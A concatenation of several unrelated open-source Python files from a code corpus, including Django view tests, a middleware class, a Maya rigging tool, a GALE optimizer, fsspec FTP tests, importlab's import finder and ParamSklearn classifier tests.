Xtest, ytest = X[int(k*num_examples):, :], y[int(k*num_examples):]
Xtrain, ytrain = X[:int(k*num_examples), :], y[:int(k*num_examples)]
nb_classifier = MultinomialNB().fit(Xtrain, ytrain)
nb_predicted_tags = nb_classifier.predict(Xtest)
nb_success_rate = np.mean(nb_predicted_tags == ytest)
return 1-nb_success_rate
def support_vector(segment_tags, k=0.5, normalize=False):
X, y, segments = randomize_order(*bag_of_words(segment_tags, tfidf=normalize))
num_examples = len(segments)
Xtest, ytest = X[int(k*num_examples):, :], y[int(k*num_examples):]
Xtrain, ytrain = X[:int(k*num_examples), :], y[:int(k*num_examples)]
svm_classifier = svm.SVC()
svm_classifier.fit(Xtrain, ytrain)
svm_predicted_tags = svm_classifier.predict(Xtest)
svm_success_rate = np.mean(svm_predicted_tags == ytest)
return 1-svm_success_rate
if __name__ == "__main__":
orig_segment_tags = parsetags.parse_tags(sys.argv[1])
common_words = get_common_words()
named_entities = get_named_entities()
for sample_size in ['BIG']:
if sample_size == 'BIG':
segment_tags = increase_num_segments(orig_segment_tags, 3000, length=1000)
orig_segment_tags = segment_tags
for text_features in ['REGULAR', 'STEMMED', 'NAMED']:
if text_features == 'STEMMED':
segment_tags = stemming_reduction(orig_segment_tags)
if text_features == 'NAMED':
segment_tags = named_entity_reduction(orig_segment_tags, named_entities, common_words)
for freq_feature in ['COUNT', 'TFIDF']:
# ntags = get_top_tags(segment_tags, 7)
print(sample_size, text_features, freq_feature)
ntags = ['ETA', 'EHDRH', 'AFR']
filtered_segtags = filter_segments(segment_tags, ntags)
with open('Results/' + sample_size + '_' + text_features + '_' + freq_feature + '.txt', 'w') as f:
for i in range(100):
f.write(str(naive_bayes(filtered_segtags, normalize=(freq_feature is 'TFIDF'))) + '\n')
# segment_tags = parsetags.parse_tags(sys.argv[1])
# big_segment_tags = increase_num_segments(segment_tags, 3000, length=1000)
# ntags = get_top_tags(segment_tags, 7)
# for
# # ntags = ['NULL', 'ETA', 'EHDRH', 'AFR']
# common_words = get_common_words()
# named_entities = get_named_entities()
# filtered_segtags = filter_segments(segment_tags, ntags)
# #entity_bow(filtered_segtags, named_entities, common_words)
# naive_bayes(filtered_segtags, named_entities, common_words, features=entity_bow)
# naive_bayes(filtered_segtags)
# support_vector(filtered_segtags)
# predicted_tags = [ntags[int(np.round(nb_predicted_tags[i]))] for i in range(len(svm_predicted_tags))]
# count = 0
# print(ntags)
# for i in range(len(predicted_tags)):
# if predicted_tags[i] == 'NULL':
# if all(tag not in segment_tags[shuffled_segments[i]] for tag in ntags):
# count += 1
# else:
# if predicted_tags[i] in segment_tags[shuffled_segments[i]]:
# count += 1
# print(count/len(predicted_tags))
| mit | 4,742,825,620,163,231,000 | 33.544 | 104 | 0.683997 | false |
sburnett/seattle | seattlegeni/website/html/tests/ut_html_test_get_resources.py | 1 | 5863 | """
<Program>
test_get_resources.py
<Started>
8/30/2009
<Author>
Jason Chen
[email protected]
<Purpose>
Tests that the get_resources view function
handles normal operation and exceptions correctly.
<Notes>
See test_register.py for an explanation of our usage of the Django test client.
"""
#pragma out
# We import the testlib FIRST, as the test db settings
# need to be set before we import anything else.
from seattlegeni.tests import testlib
from seattlegeni.common.exceptions import *
from seattlegeni.website.control import interface
from seattlegeni.website.control import models
from django.contrib.auth.models import User as DjangoUser
# The django test client emulates a webclient, and returns what django
# considers the final rendered result (in HTML). This allows to test purely the view
# functions.
from django.test.client import Client
# Declare our mock functions
def mock_get_logged_in_user(request):
geniuser = models.GeniUser(username='tester', password='password', email='[email protected]',
affiliation='test affil', user_pubkey='user_pubkey',
user_privkey='user_privkey', donor_pubkey='donor_pubkey',
usable_vessel_port='12345', free_vessel_credits=10)
return geniuser
def mock_acquire_vessels(geniuser, vesselcount, vesseltype):
return ['test1', 'test2']
def mock_acquire_vessels_throws_UnableToAcquireResourcesError(geniuser, vesselcount, vesseltype):
raise UnableToAcquireResourcesError
def mock_acquire_vessels_throws_InsufficientUserResourcesError(geniuser, vesselcount, vesseltype):
raise InsufficientUserResourcesError
c = Client()
good_data = {'num':5, 'env':'rand'}
def main():
# Setup test environment
testlib.setup_test_environment()
testlib.setup_test_db()
try:
login_test_user()
test_normal()
test_interface_throws_UnableToAcquireResourcesError()
test_interface_throws_InsufficientUserResourcesError()
test_blank_POST_data()
test_invalid_POST_data_invalid_num()
test_invalid_POST_data_invalid_env()
print "All tests passed."
finally:
testlib.teardown_test_db()
testlib.teardown_test_environment()
def test_normal():
"""
<Purpose>
Test normal behavior
"""
interface.acquire_vessels = mock_acquire_vessels
response = c.post('/html/get_resources', good_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
def test_interface_throws_UnableToAcquireResourcesError():
"""
<Purpose>
Test behavior if interface throws UnableToAcquireResourcesError.
<Note>
Checking only the existance of "action_summary" in the response
is sufficient in seeing whether the view caught the error, since
error messages are shown in that html element. (Of course, so are
normal messages, but we are clearly having the interface throw an
exception, so normal messages don't even exist in this context).
"""
interface.acquire_vessels = mock_acquire_vessels_throws_UnableToAcquireResourcesError
response = c.post('/html/get_resources', good_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Unable to acquire vessels at this time" in response.content)
def test_interface_throws_InsufficientUserResourcesError():
"""
<Purpose>
Test behavior if interface throws InsufficientUserResourcesError.
"""
interface.acquire_vessels = mock_acquire_vessels_throws_InsufficientUserResourcesError
response = c.post('/html/get_resources', good_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Unable to acquire" in response.content)
assert("vessel credit" in response.content)
def test_blank_POST_data():
"""
<Purpose>
Test behavior if we submit blank POST data.
"""
interface.acquire_vessels = mock_acquire_vessels
response = c.post('/html/get_resources', {}, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("This field is required" in response.content)
def test_invalid_POST_data_invalid_num():
"""
<Purpose>
Test behavior if we submit POST data with an invalid 'num' field.
"""
interface.acquire_vessels = mock_acquire_vessels
test_data = {'num':-5, 'env':'rand'}
response = c.post('/html/get_resources', test_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Select a valid choice" in response.content)
def test_invalid_POST_data_invalid_env():
"""
<Purpose>
Test behavior if we submit POST data with an invalid 'env' field.
"""
interface.acquire_vessels = mock_acquire_vessels
test_data = {'num':5, 'env':'notvalid'}
response = c.post('/html/get_resources', test_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Select a valid choice" in response.content)
# Creates a test user in the test db, and uses the test client to 'login',
# so all views that expect @login_required will now pass the login check.
def login_test_user():
# uses the mock get_logged_in_user function that represents a logged in user
interface.get_logged_in_user = mock_get_logged_in_user
user = DjangoUser.objects.create_user('tester', '[email protected]', 'testpassword')
user.save()
c.login(username='tester', password='testpassword')
if __name__=="__main__":
main() | mit | -4,059,790,173,869,409,300 | 29.196809 | 98 | 0.696572 | false |
daGrevis/squirrel | ware.py | 1 | 2640 | import inspect
class MiddlewareDuplicationError(Exception):
def __init__(self, middleware_name, middleware_names):
message = ("Middleware `{}` was already found in `{}` middlewares!"
.format(middleware_name, middleware_names))
super().__init__(message)
class MiddlewareMissingError(Exception):
def __init__(self, middleware_name, middleware_names):
message = ("Middleware `{}` wasn't found between `{}` middlewares!"
.format(middleware_name, middleware_names))
super().__init__(message)
class MiddlewareOrderError(Exception):
def __init__(self, middleware_name,
names_for_before_middlewares, names_for_after_middlewares):
message = ("Middleware `{}` can't be added before `{}` middlewares"
" and after `{}` middlewares!"
.format(middleware_name,
names_for_before_middlewares,
names_for_after_middlewares))
super().__init__(message)
class MiddlewareArgumentsError(Exception):
def __init__(self, middleware_name):
message = ("Middleware `{}` has wrong count of arguments!"
.format(middleware_name))
super().__init__(message)
class Ware(object):
def __init__(self, middlewares=[]):
self.middlewares = []
def get_names_for_middlewares(self):
return [name for name, _ in self.middlewares]
def add(self, middleware_name, middleware_callable):
if len((inspect.getfullargspec(middleware_callable)).args) != 1:
raise MiddlewareArgumentsError(middleware_name)
names_for_middlewares = self.get_names_for_middlewares()
if middleware_name in names_for_middlewares:
raise MiddlewareDuplicationError(middleware_name,
names_for_middlewares)
(self.middlewares).append((middleware_name, middleware_callable, ))
def remove(self, middleware_name):
names_for_middlewares = self.get_names_for_middlewares()
if middleware_name not in names_for_middlewares:
raise MiddlewareMissingError(middleware_name,
names_for_middlewares)
for i, (name, _) in enumerate(self.middlewares):
if name == middleware_name:
(self.middlewares).pop(i)
break
def run(self, initial_context={}):
context = initial_context
for _, middleware_callable in self.middlewares:
context = middleware_callable(context)
return context
| mit | -4,876,543,742,609,040,000 | 33.285714 | 76 | 0.6 | false |
ejekt/rigging-system | Modules/System/groupSelected.py | 1 | 9019 | import maya.cmds as mc
from functools import partial
import os
import System.utils as utils
class GroupSelected:
def __init__(self):
self.objectsToGroup = []
def showUI(self):
# build the grouping GUI
self.findSelectionToGroup()
if len(self.objectsToGroup) == 0:
return
self.dUiElements = {}
if mc.window('groupSelected_UI_window', exists=True):
mc.deleteUI('groupSelected_UI_window')
windowWidth = 300
windowHeight = 150
self.dUiElements['window'] = mc.window('groupSelected_UI_window',
w=windowWidth,
h=windowHeight,
t='Blueprint UI',
sizeable=False,)
self.dUiElements['topLevelColumn'] = mc.columnLayout(adj=True, columnAlign='center', rs=3)
self.dUiElements['groupName_rowColumn'] = mc.rowColumnLayout(nc=2, columnAttach=[1,'right',0], columnWidth=[(1,80), (2,windowWidth-90)])
mc.text(label='Group Name :')
self.dUiElements['groupName'] = mc.textField(text='group')
mc.setParent(self.dUiElements['topLevelColumn'])
self.dUiElements['createAt_rowColumn'] = mc.rowColumnLayout(nc=3, columnAttach=(1,'right',0), columnWidth=[(1,80),(2,windowWidth-170),(3,80)])
# row 1
mc.text(label='Position at :')
mc.text(label='')
mc.text(label='')
# row 2
mc.text(label='')
self.dUiElements['createAtBtn_lastSelected'] = mc.button(l='Last Selected', c=self.createAtLastSelected)
mc.text(label='')
# row 3
mc.text(label='')
self.dUiElements['createAveragePosBtn_lastSelected'] = mc.button(l='Average Position', c=self.createAtAveragePosition)
mc.text(label='')
mc.setParent(self.dUiElements['topLevelColumn'])
mc.separator()
# final row of buttons
columnWidth = (windowWidth/2) - 5
self.dUiElements['buttonRowLayout'] = mc.rowLayout(nc=2,
columnAttach=[(1,'both',10),(2,'both',10)],
columnWidth=[(1,columnWidth),(2,columnWidth)],
columnAlign=[(1,'center'),(2,'center')])
self.dUiElements['acceptBtn'] = mc.button(l='Accept', c=self.acceptWindow)
self.dUiElements['cancelBtn'] = mc.button(l='Cancel', c=self.cancelWindow)
mc.showWindow(self.dUiElements['window'])
self.createTempGroupRepresentation()
self.createAtLastSelected()
mc.select(self.tempGrpTransform, r=True)
mc.setToolTo('moveSuperContext')
def findSelectionToGroup(self):
# filters selection to only contain module transform controls
selectedObjects = mc.ls(sl=True, transforms=True)
self.objectsToGroup = []
for obj in selectedObjects:
valid = False
if obj.find('module_transform') != -1:
splitString = obj.rsplit('module_transform')
if splitString[1] == '':
valid = True
if valid == False and obj.find('Group__') == 0:
valid = True
if valid == True:
self.objectsToGroup.append(obj)
def createTempGroupRepresentation(self):
controlGrpFile = os.environ['RIGGING_TOOL_ROOT'] + '/ControlObjects/Blueprint/controlGroup_control.ma'
mc.file(controlGrpFile, i=True)
self.tempGrpTransform = mc.rename('controlGroup_control', 'Group__tempGroupTransform__')
mc.connectAttr(self.tempGrpTransform+'.sy', self.tempGrpTransform+'.sx')
mc.connectAttr(self.tempGrpTransform+'.sy', self.tempGrpTransform+'.sz')
for attr in ['sx','sz','v']:
mc.setAttr(self.tempGrpTransform+'.'+attr, l=True, k=False)
mc.aliasAttr('globalScale', self.tempGrpTransform+'.sy')
def createAtLastSelected(self, *args):
controlPos = mc.xform(self.objectsToGroup[-1], q=True, ws=True, t=True)
mc.xform(self.tempGrpTransform, ws=True, absolute=True, t=controlPos)
def createAtAveragePosition(self, *args):
controlPos = [0.0,0.0,0.0]
for obj in self.objectsToGroup:
objPos = mc.xform(obj, q=True, ws=True, absolute=True, t=True)
controlPos[0] += objPos[0]
controlPos[1] += objPos[1]
controlPos[2] += objPos[2]
numberOfObjects = len(self.objectsToGroup)
controlPos[0] /= numberOfObjects
controlPos[1] /= numberOfObjects
controlPos[2] /= numberOfObjects
mc.xform(self.tempGrpTransform, ws=True, absolute=True, t=controlPos)
def cancelWindow(self, *args):
mc.deleteUI(self.dUiElements['window'])
mc.delete(self.tempGrpTransform)
def acceptWindow(self, *args):
groupName = mc.textField(self.dUiElements['groupName'], q=True, text=True)
if self.createGroup(groupName) != None:
mc.deleteUI(self.dUiElements['window'])
def createGroup(self, sGroupName):
# check that group of that name doesn't exist yet
fullGroupName = 'Group__' + sGroupName
if mc.objExists(fullGroupName):
mc.confirmDialog(title='Name Conflict', m='Group \''+groupName+'\' already exists', button='Accept', db='Accept')
return None
# rename the tempGroup to the user specified name
groupTransform = mc.rename(self.tempGrpTransform, fullGroupName)
groupContainer = 'group_container'
if not mc.objExists(groupContainer):
mc.container(n=groupContainer)
containers = [groupContainer]
for obj in self.objectsToGroup:
if obj.find('Group__') == 0:
continue
objNamespace = utils.stripLeadingNamespace(obj)[0]
containers.append(objNamespace+':module_container')
for c in containers:
mc.lockNode(c, lock=False, lockUnpublished=False)
if len(self.objectsToGroup) != 0:
tempGroup = mc.group(self.objectsToGroup, absolute=True)
groupParent = mc.listRelatives(tempGroup, parent=True)
if groupParent:
mc.parent(groupTransform, groupParent[0], absolute=True)
mc.parent(self.objectsToGroup, groupTransform, absolute=True)
mc.delete(tempGroup)
self.addGroupToContainer(groupTransform)
for c in containers:
mc.lockNode(c, lock=True, lockUnpublished=True)
mc.setToolTo('moveSuperContext')
mc.select(groupTransform, r=True)
return groupTransform
def addGroupToContainer(self, sGroup):
groupContainer = 'group_container'
utils.addNodeToContainer(groupContainer, sGroup, includeShapes=True)
groupName = sGroup.rpartition('Group__')[2]
mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.t', groupName+'_T'])
mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.r', groupName+'_R'])
mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.globalScale', groupName+'_globalScale'])
def createGroupAtSpecified(self, sName, sTargetGroup, sParent):
self.createTempGroupRepresentation()
pCon = mc.parentConstraint(sTargetGroup, self.tempGrpTransform , mo=False)[0]
mc.delete(pCon)
scale = mc.getAttr(sTargetGroup+'.globalScale')
mc.setAttr(self.tempGrpTransform +'.globalScale', scale)
if sParent:
mc.parent(self.tempGrpTransform , sParent, absolute=True)
newGroup = self.createGroup(sName)
return newGroup
###-------------------------------------------------------------------------------------------
### UNGROUPED SELECTED CLASS
class UngroupSelected:
def __init__(self):
selectedObjects = mc.ls(sl=True, transforms=True)
filteredGroups = []
for obj in selectedObjects:
if obj.find('Group__') == 0:
filteredGroups.append(obj)
# no group selected just exit
if len(filteredGroups) == 0:
return
groupContainer = 'group_container'
# find any modules nested under the selected group
modules = []
for group in filteredGroups:
modules.extend(self.findChildModules(group))
# gather all module containers
moduleContainers = [groupContainer]
for module in modules:
moduleContainer = module + ':module_container'
moduleContainers.append(moduleContainer)
# unlock each container
for container in moduleContainers:
mc.lockNode(container, l=False, lockUnpublished=False)
# ungroup
for group in filteredGroups:
numChildren = len(mc.listRelatives(group, children=True))
if numChildren > 1:
mc.ungroup(group, absolute=True)
for attr in ['t','r','globalScale']:
mc.container(groupContainer, e=True, unbindAndUnpublish=group+'.'+attr)
parentGroup = mc.listRelatives(group, parent=True)
mc.delete(group)
# for the case that a group is left empty
if parentGroup != None:
parentGroup = parentGroup[0]
children = mc.listRelatives(parentGroup, children=True)
children = mc.ls(children, transforms=True)
if len(children) == 0:
mc.select(parentGroup, r=True)
UngroupSelected()
# lock the container
for container in moduleContainers:
if mc.objExists(container):
mc.lockNode(container, l=True, lockUnpublished=True)
def findChildModules(self, sGroup):
modules = []
children = mc.listRelatives(sGroup, children = True)
if children != None:
for child in children:
moduleNamespaceInfo = utils.stripLeadingNamespace(child)
if moduleNamespaceInfo:
modules.append(moduleNamespaceInfo[0])
elif child.find('Group__') != -1:
modules.extend(self.findChildModules(child))
return modules
| mit | -222,559,346,205,777,180 | 29.98227 | 144 | 0.684777 | false |
ai-se/parGALE | algorithms/serial/gale/gale.py | 1 | 6295 | from __future__ import print_function, division
import sys, os
sys.path.append(os.path.abspath("."))
from utils.lib import *
from algorithms.serial.algorithm import Algorithm
from where import Node, sqrt
__author__ = 'panzer'
def default_settings():
"""
Default Settings for NSGA 3
:return: default settings
"""
return O(
pop_size = 100,
gens = 50,
allowDomination = True,
gamma = 0.15
)
class GALE(Algorithm):
count = 0
unsatisfied = 0
"""
.. [Krall2015] Krall, Menzies et.all, "
GALE: Geometric Active Learning for Search-Based Software Engineering"
Check References folder for the paper
"""
def __init__(self, problem, **settings):
"""
Initialize GALE algorithm
:param problem: Instance of the problem
:param gens: Max number of generations
"""
Algorithm.__init__(self, GALE.__name__, problem)
self.select = self._select
self.evolve = self._evolve
self.recombine = self._recombine
self.settings = default_settings().update(**settings)
def run(self, init_pop=None):
if init_pop is None:
init_pop = self.problem.populate(self.settings.pop_size)
population = Node.format(init_pop)
best_solutions = []
gen = 0
while gen < self.settings.gens:
say(".")
total_evals = 0
# SELECTION
selectees, evals = self.select(population)
solutions, evals = self.get_best(selectees)
best_solutions += solutions
total_evals += evals
# EVOLUTION
selectees, evals = self.evolve(selectees)
total_evals += evals
population, evals = self.recombine(selectees, self.settings.pop_size)
total_evals += evals
gen += 1
print("")
return best_solutions
def get_best(self, non_dom_leaves):
"""
Return the best row from all the
non dominated leaves
:param non_dom_leaves:
:return:
"""
bests = []
evals = 0
for leaf in non_dom_leaves:
east = leaf._pop[0]
west = leaf._pop[-1]
if not east.evaluated:
east.evaluate(self.problem)
evals += 1
if not west.evaluated:
west.evaluate(self.problem)
evals += 1
weights = self.problem.directional_weights()
weighted_west = [c*w for c,w in zip(west.objectives, weights)]
weighted_east = [c*w for c,w in zip(east.objectives, weights)]
objs = self.problem.objectives
west_loss = Algorithm.dominates_continuous(weighted_west,
weighted_east,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
east_loss = Algorithm.dominates_continuous(weighted_east,
weighted_west,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
if east_loss < west_loss:
bests.append(east)
else:
bests.append(west)
return bests, evals
def _select(self, pop):
node = Node(self.problem, pop, self.settings.pop_size).divide(sqrt(pop))
non_dom_leafs = node.nonpruned_leaves()
all_leafs = node.leaves()
# Counting number of evals
evals = 0
for leaf in all_leafs:
for row in leaf._pop:
if row.evaluated:
evals+=1
return non_dom_leafs, evals
def _evolve(self, selected):
evals = 0
GAMMA = self.settings.gamma
for leaf in selected:
#Poles
east = leaf._pop[0]
west = leaf._pop[-1]
# Evaluate poles if required
if not east.evaluated:
east.evaluate(self.problem)
evals += 1
if not west.evaluated:
west.evaluate(self.problem)
evals += 1
weights = self.problem.directional_weights()
weighted_west = [c*w for c,w in zip(west.objectives, weights)]
weighted_east = [c*w for c,w in zip(east.objectives, weights)]
objs = self.problem.objectives
west_loss = Algorithm.dominates_continuous(weighted_west,
weighted_east,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
east_loss = Algorithm.dominates_continuous(weighted_east,
weighted_west,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
# Determine better Pole
if east_loss < west_loss:
south_pole,north_pole = east,west
else:
south_pole,north_pole = west,east
# Magnitude of the mutations
g = abs(south_pole.x - north_pole.x)
for row in leaf._pop:
clone = row.clone()
clone_x = row.x
for dec_index in range(len(self.problem.decisions)):
# Few naming shorthands
me = row.decisions[dec_index]
good = south_pole.decisions[dec_index]
bad = north_pole.decisions[dec_index]
dec = self.problem.decisions[dec_index]
if me > good: d = -1
elif me < good: d = +1
else : d = 0
# Mutating towards the better solution
row.decisions[dec_index] = min(dec.high, max(dec.low, me + me * g * d))
# Project the mutant
a = row.dist(self.problem, north_pole, is_obj=False)
b = row.dist(self.problem, south_pole, is_obj=False)
x = (a**2 + row.c**2 - b**2) / (2*row.c+0.00001)
row.x = x
GALE.count += 1
if abs(x - clone_x) > (g * GAMMA) or not self.problem.check_constraints(row.decisions):
GALE.unsatisfied += 1
row.decisions = clone.decisions
row.x = clone_x
pop = []
for leaf in selected:
for row in leaf._pop:
if row.evaluated:
row.evaluate(self.problem) # Re-evaluating
pop.append(row)
return pop, evals
def _recombine(self, mutants, total_size):
remaining = total_size - len(mutants)
pop = []
for _ in range(remaining):
pop.append(self.problem.generate())
return mutants + Node.format(pop), 0
def _test():
from problems.feature_models.webportal import WebPortal
import time
o = WebPortal()
gale = GALE(o)
start = time.time()
gale.run()
print(time.time() - start)
print(GALE.count, GALE.unsatisfied)
if __name__ == "__main__":
_test() | unlicense | -9,061,544,763,114,333,000 | 28.980952 | 95 | 0.581732 | false |
intake/filesystem_spec | fsspec/implementations/tests/test_ftp.py | 1 | 3434 | import os
import subprocess
import sys
import time
import pytest
import fsspec
from fsspec import open_files
from fsspec.implementations.ftp import FTPFileSystem
here = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture()
def ftp():
pytest.importorskip("pyftpdlib")
P = subprocess.Popen(
[sys.executable, "-m", "pyftpdlib", "-d", here],
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
)
try:
time.sleep(1)
yield "localhost", 2121
finally:
P.terminate()
P.wait()
def test_basic(ftp):
host, port = ftp
fs = FTPFileSystem(host, port)
assert fs.ls("/", detail=False) == sorted(os.listdir(here))
out = fs.cat("/" + os.path.basename(__file__))
assert out == open(__file__, "rb").read()
def test_not_cached(ftp):
host, port = ftp
fs = FTPFileSystem(host, port)
fs2 = FTPFileSystem(host, port)
assert fs is not fs2
@pytest.mark.parametrize("cache_type", ["bytes", "mmap"])
def test_complex(ftp_writable, cache_type):
from fsspec.core import BytesCache
host, port, user, pw = ftp_writable
files = open_files(
"ftp:///ou*",
host=host,
port=port,
username=user,
password=pw,
block_size=10000,
cache_type=cache_type,
)
assert len(files) == 1
with files[0] as fo:
assert fo.read(10) == b"hellohello"
if isinstance(fo.cache, BytesCache):
assert len(fo.cache.cache) == 10010
assert fo.read(2) == b"he"
assert fo.tell() == 12
def test_write_small(ftp_writable):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw)
with fs.open("/out2", "wb") as f:
f.write(b"oi")
assert fs.cat("/out2") == b"oi"
def test_with_url(ftp_writable):
host, port, user, pw = ftp_writable
fo = fsspec.open("ftp://{}:{}@{}:{}/out".format(user, pw, host, port), "wb")
with fo as f:
f.write(b"hello")
fo = fsspec.open("ftp://{}:{}@{}:{}/out".format(user, pw, host, port), "rb")
with fo as f:
assert f.read() == b"hello"
@pytest.mark.parametrize("cache_type", ["bytes", "mmap"])
def test_write_big(ftp_writable, cache_type):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw, block_size=1000, cache_type=cache_type)
fn = "/bigger"
with fs.open(fn, "wb") as f:
f.write(b"o" * 500)
assert not fs.exists(fn)
f.write(b"o" * 1000)
fs.invalidate_cache()
assert fs.exists(fn)
f.write(b"o" * 200)
f.flush()
assert fs.info(fn)["size"] == 1700
assert fs.cat(fn) == b"o" * 1700
def test_transaction(ftp_writable):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw)
fs.mkdir("/tmp")
fn = "/tr"
with fs.transaction:
with fs.open(fn, "wb") as f:
f.write(b"not")
assert not fs.exists(fn)
assert fs.exists(fn)
assert fs.cat(fn) == b"not"
fs.rm(fn)
assert not fs.exists(fn)
def test_transaction_with_cache(ftp_writable):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw)
fs.mkdir("/tmp")
fs.mkdir("/tmp/dir")
assert "dir" in fs.ls("/tmp", detail=False)
with fs.transaction:
fs.rmdir("/tmp/dir")
assert "dir" not in fs.ls("/tmp", detail=False)
assert not fs.exists("/tmp/dir")
| bsd-3-clause | 1,466,260,043,482,891,300 | 25.015152 | 84 | 0.586488 | false |
google/importlab | importlab/import_finder.py | 1 | 5424 | # NOTE: Do not add any dependencies to this file - it needs to be run in a
# subprocess by a python version that might not have any installed packages,
# including importlab itself.
from __future__ import print_function
import ast
import json
import os
import sys
# Pytype doesn't recognize the `major` attribute:
# https://github.com/google/pytype/issues/127.
if sys.version_info[0] >= 3:
# Note that `import importlib` does not work: accessing `importlib.util`
# will give an attribute error. This is hard to reproduce in a unit test but
# can be seen by installing importlab in a Python 3 environment and running
# `importlab --tree --trim` on a file that imports one of:
# * jsonschema (`pip install jsonschema`)
# * pytype (`pip install pytype`),
# * dotenv (`pip install python-dotenv`)
# * IPython (`pip install ipython`)
# A correct output will look like:
# Reading 1 files
# Source tree:
# + foo.py
# :: jsonschema/__init__.py
# An incorrect output will be missing the line with the import.
import importlib.util
else:
import imp
class ImportFinder(ast.NodeVisitor):
"""Walk an AST collecting import statements."""
def __init__(self):
# tuples of (name, alias, is_from, is_star)
self.imports = []
def visit_Import(self, node):
for alias in node.names:
self.imports.append((alias.name, alias.asname, False, False))
def visit_ImportFrom(self, node):
module_name = '.'*node.level + (node.module or '')
for alias in node.names:
if alias.name == '*':
self.imports.append((module_name, alias.asname, True, True))
else:
if not module_name.endswith('.'):
module_name = module_name + '.'
name = module_name + alias.name
asname = alias.asname or alias.name
self.imports.append((name, asname, True, False))
def _find_package(parts):
"""Helper function for _resolve_import_versioned."""
for i in range(len(parts), 0, -1):
prefix = '.'.join(parts[0:i])
if prefix in sys.modules:
return i, sys.modules[prefix]
return 0, None
def is_builtin(name):
return name in sys.builtin_module_names or name.startswith("__future__")
# Pytype doesn't recognize the `major` attribute:
# https://github.com/google/pytype/issues/127.
if sys.version_info[0] < 3:
def _resolve_import_versioned(name):
"""Python 2 helper function for resolve_import."""
parts = name.split('.')
i, mod = _find_package(parts)
if mod:
if hasattr(mod, '__file__'):
path = [os.path.dirname(mod.__file__)]
elif hasattr(mod, '__path__'):
path = mod.__path__
else:
path = None
else:
path = None
for part in parts[i:]:
try:
if path:
spec = imp.find_module(part, [path])
else:
spec = imp.find_module(part)
except ImportError:
return None
path = spec[1]
return path
else:
def _resolve_import_versioned(name):
"""Python 3 helper function for resolve_import."""
try:
spec = importlib.util.find_spec(name)
return spec and spec.origin
except Exception:
# find_spec may re-raise an arbitrary exception encountered while
# inspecting a module. Since we aren't able to get the file path in
# this case, we consider the import unresolved.
return None
def _resolve_import(name):
"""Helper function for resolve_import."""
if name in sys.modules:
return getattr(sys.modules[name], '__file__', name + '.so')
return _resolve_import_versioned(name)
def resolve_import(name, is_from, is_star):
"""Use python to resolve an import.
Args:
name: The fully qualified module name.
Returns:
The path to the module source file or None.
"""
# Don't try to resolve relative imports or builtins here; they will be
# handled by resolve.Resolver
if name.startswith('.') or is_builtin(name):
return None
ret = _resolve_import(name)
if ret is None and is_from and not is_star:
package, _ = name.rsplit('.', 1)
ret = _resolve_import(package)
return ret
def get_imports(filename):
"""Get all the imports in a file.
Each import is a tuple of:
(name, alias, is_from, is_star, source_file)
"""
with open(filename, "rb") as f:
src = f.read()
finder = ImportFinder()
finder.visit(ast.parse(src, filename=filename))
imports = []
for i in finder.imports:
name, _, is_from, is_star = i
imports.append(i + (resolve_import(name, is_from, is_star),))
return imports
def print_imports(filename):
"""Print imports in csv format to stdout."""
print(json.dumps(get_imports(filename)))
def read_imports(imports_str):
"""Print imports in csv format to stdout."""
return json.loads(imports_str)
if __name__ == "__main__":
# This is used to parse a file with a different python version, launching a
# subprocess and communicating with it via reading stdout.
filename = sys.argv[1]
print_imports(filename)
| apache-2.0 | 7,626,106,175,522,213,000 | 31.285714 | 80 | 0.599742 | false |
automl/paramsklearn | tests/test_classification.py | 1 | 31256 | import os
import resource
import sys
import traceback
import unittest
import mock
import numpy as np
import sklearn.datasets
import sklearn.decomposition
import sklearn.cross_validation
import sklearn.ensemble
import sklearn.svm
from sklearn.utils.testing import assert_array_almost_equal
from HPOlibConfigSpace.configuration_space import ConfigurationSpace, \
Configuration
from HPOlibConfigSpace.hyperparameters import CategoricalHyperparameter
from ParamSklearn.classification import ParamSklearnClassifier
from ParamSklearn.components.base import ParamSklearnClassificationAlgorithm
from ParamSklearn.components.base import ParamSklearnPreprocessingAlgorithm
import ParamSklearn.components.classification as classification_components
import ParamSklearn.components.feature_preprocessing as preprocessing_components
from ParamSklearn.util import get_dataset
from ParamSklearn.constants import *
class TestParamSklearnClassifier(unittest.TestCase):
def test_io_dict(self):
classifiers = classification_components._classifiers
for c in classifiers:
if classifiers[c] == classification_components.ClassifierChoice:
continue
props = classifiers[c].get_properties()
self.assertIn('input', props)
self.assertIn('output', props)
inp = props['input']
output = props['output']
self.assertIsInstance(inp, tuple)
self.assertIsInstance(output, tuple)
for i in inp:
self.assertIn(i, (SPARSE, DENSE, SIGNED_DATA, UNSIGNED_DATA))
self.assertEqual(output, (PREDICTIONS,))
self.assertIn('handles_regression', props)
self.assertFalse(props['handles_regression'])
self.assertIn('handles_classification', props)
self.assertIn('handles_multiclass', props)
self.assertIn('handles_multilabel', props)
def test_find_classifiers(self):
classifiers = classification_components._classifiers
self.assertGreaterEqual(len(classifiers), 2)
for key in classifiers:
if hasattr(classifiers[key], 'get_components'):
continue
self.assertIn(ParamSklearnClassificationAlgorithm,
classifiers[key].__bases__)
def test_find_preprocessors(self):
preprocessors = preprocessing_components._preprocessors
self.assertGreaterEqual(len(preprocessors), 1)
for key in preprocessors:
if hasattr(preprocessors[key], 'get_components'):
continue
self.assertIn(ParamSklearnPreprocessingAlgorithm,
preprocessors[key].__bases__)
